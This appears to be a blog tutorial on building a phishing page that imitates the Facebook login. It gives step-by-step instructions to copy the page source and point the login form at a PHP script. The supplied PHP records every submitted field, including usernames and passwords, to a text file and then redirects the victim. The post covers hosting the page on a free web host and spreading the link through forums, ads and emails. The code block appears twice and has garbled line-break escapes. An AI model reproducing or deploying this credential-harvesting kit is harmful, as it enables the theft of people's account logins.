- Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
- Go ahead and dump all of the page’s source code into Notepad.
- If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
- You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
- Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
- Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
- Next, create a new notepad document with the name of post.php.Omit the final period from the filename. Copy and paste the following code into this document,and remember to save it:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
- At this point, you should now have two files saved: index.htm and post.php.
- Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using 000Webhost.
- After you have signed up for an account, browse to the control panel, and then to file manager.
- Once the window opens, go to public_html.
- Delete default.php, and then upload index.htm and post.php.
- Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
- The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
- Now go back to the file manager and public_html. There should be a file labeled username.txt.
- Open this file and you should be able to see login credentials that have been entered by a test user.
Thank you for visiting.😊
Hope you liked the post.👍
For further details contact through contact form.
See you soon.☻
Have a nice day.😃
Stay happy and Blessed.😗
0 Comments